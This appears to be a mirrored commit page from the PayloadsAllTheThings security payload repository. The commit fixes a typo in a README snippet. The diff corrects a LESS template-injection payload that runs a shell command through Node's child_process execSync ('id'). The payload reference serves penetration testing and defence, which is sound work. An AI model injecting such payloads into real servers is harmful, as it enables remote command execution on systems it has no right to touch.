mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 22:33:00 +00:00
Update README.md
Fixes a typo
This commit is contained in:
parent
a0c08e4e87
commit
6841fc21d2
1 changed files with 1 additions and 1 deletions
|
@ -569,7 +569,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
|
|
||||||
```less
|
```less
|
||||||
body {
|
body {
|
||||||
color: `global.process.mainModule.require("child_process").execSync("id"`;
|
color: `global.process.mainModule.require("child_process").execSync("id")`;
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue